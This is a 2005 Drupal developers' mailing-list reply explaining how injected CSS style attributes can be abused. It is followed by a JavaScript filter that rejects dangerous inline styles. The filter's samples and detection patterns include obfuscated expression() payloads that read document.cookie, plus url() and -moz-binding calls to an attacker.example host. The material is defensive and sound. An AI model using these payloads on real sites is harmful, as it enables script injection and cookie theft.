[drupal-devel] Question on valid_input_data()

puregin puregin at puregin.org
Sun May 8 07:53:45 UTC 2005


On 7 May 2005, at 8:13 PM, K B wrote:

> In 4.6 includes/common.inc, in the function valid_input_data(), there
> is a check for various entities. Among these entities, there is a
> check for "style".
>
> http://drupaldocs.org/api/4.6/function/valid_input_data
>
> I use the banner module with text ads, and I use things like:
>
> <div style="some-style-definitions">some text</div>
>
> This check causes the above to be flagged as a security breach attempt
> and is logged to the watchdog as such.
>
> http://drupal.org/node/20608#comment-29106
>
> My question is: Can the "style" element be used in malicious attacks?
> If yes, then how?
>

     Hi K B, yes, the style element can be used in attacks.  If an attacker can
place CSS on your page, arbitrary elements can be moved, or hidden;
images can be replaced, or tiled to completely render the page
useless; images can be used in information leak attempts and
some browsers extend CSS to allow the execution of scripts.

A little Google search for "style element css attack" should yield more details.

    Regards,     Djun

> Thanks in advance.
>
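As an added illustration of the attack classes Djun lists (this is not Drupal's valid_input_data() and not code from this thread), the following JavaScript classifier decides whether an inline style attribute from a text ad is harmless or one of: layout properties that move, hide or overlay content; url() values that swap in or tile attacker images or act as a tracking request; and the browser-specific CSS extensions that execute script (IE expression() and behavior:, Gecko -moz-binding). The property allowlist, the pattern list and the sample styles are assumptions constructed for this example, and it also undoes the two CSS-level obfuscations (comments and backslash escapes) that defeat a plain substring check.

```javascript
// Added example: a small inline-style classifier illustrating the CSS attack
// classes named in the reply (moving/hiding content, remote images, script
// execution via browser CSS extensions). This is NOT Drupal's
// valid_input_data(); the allowlist, the patterns and the sample styles are
// assumptions constructed for this illustration.

// Undo CSS-level obfuscation before matching. Comments ("exp/**/ression") and
// backslash escapes ("\65xpression" -> "expression") are legal CSS and defeat
// a naive substring check.
function normalizeCss(style) {
  return String(style)
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    })
    .replace(/\\(.)/g, '$1')
    .replace(/\s+/g, ' ')
    .trim();
}

// Properties considered harmless for a text ad (assumed allowlist).
const SAFE_PROPERTIES = new Set([
  'color', 'background-color', 'font-weight', 'font-style', 'font-size',
  'font-family', 'line-height', 'text-align', 'text-decoration',
  'padding', 'margin', 'border',
]);

// Properties that let injected CSS move, hide or overlay other content.
const LAYOUT_PROPERTIES = new Set([
  'position', 'top', 'left', 'right', 'bottom', 'z-index', 'display',
  'visibility', 'opacity', 'clip', 'width', 'height',
]);

// Browser CSS extensions that execute code, plus @import. Matched against the
// whole normalized declaration so the property name is covered too.
const SCRIPT_PATTERNS = [
  [/expression\s*\(/i, 'expression()'],
  [/\bbehavior\s*:/i, 'behavior: (HTC)'],
  [/-moz-binding/i, '-moz-binding (XBL)'],
  [/(?:java|vb)script\s*:/i, 'script: URL scheme'],
  [/@import/i, '@import'],
];

// Any url() can fetch from an attacker host: replaced/tiled images, or a
// tracking request that leaks which page (and which user) rendered the ad.
const REMOTE_PATTERN = /\burl\s*\(/i;

// Returns { allowed: boolean, reasons: string[] } for one style attribute.
function classifyStyle(style) {
  const reasons = [];
  const declarations = normalizeCss(style)
    .split(';')            // naive: a ';' inside url("data:...;base64") also
    .map((d) => d.trim())  // splits, which only makes this check stricter
    .filter(Boolean);
  for (const decl of declarations) {
    const colon = decl.indexOf(':');
    const prop = (colon === -1 ? decl : decl.slice(0, colon)).trim().toLowerCase();
    const value = colon === -1 ? '' : decl.slice(colon + 1).trim();
    for (const [re, what] of SCRIPT_PATTERNS) {
      if (re.test(decl)) reasons.push(`script: ${what} in '${prop}'`);
    }
    if (REMOTE_PATTERN.test(value)) reasons.push(`remote: url() in '${prop}'`);
    if (LAYOUT_PROPERTIES.has(prop)) {
      reasons.push(`layout: '${prop}' can move or hide content`);
    } else if (!SAFE_PROPERTIES.has(prop)) {
      reasons.push(`unknown property '${prop}'`);
    }
  }
  return { allowed: reasons.length === 0, reasons };
}

// Constructed sample styles, one per attack class from the reply.
const SAMPLES = [
  'color: red; font-weight: bold',                           // benign text ad
  'position: absolute; top: 0; left: 0; z-index: 9999',      // overlay / move
  'background-color: url(http://attacker.example/seen.png)', // image swap / leak
  'width: exp/**/ression(alert(document.cookie))',           // IE script, comment-obfuscated
  'font-weight: \\65xpression(alert(1))',                    // IE script, hex-escaped
  '-moz-binding: url(http://attacker.example/evil.xml#x)',   // Gecko XBL
];

for (const s of SAMPLES) {
  const { allowed, reasons } = classifyStyle(s);
  console.log(`${allowed ? 'ALLOW ' : 'REJECT'} ${JSON.stringify(s)}` +
    (reasons.length ? '  <- ' + reasons.join('; ') : ''));
}
```

The point of the allowlist is that a text ad only needs a handful of typographic properties, so everything else can be rejected without trying to enumerate every dangerous value; the normalization step matters because the escaped and comment-split forms are exactly how a filter that greps for the literal string "expression" gets bypassed.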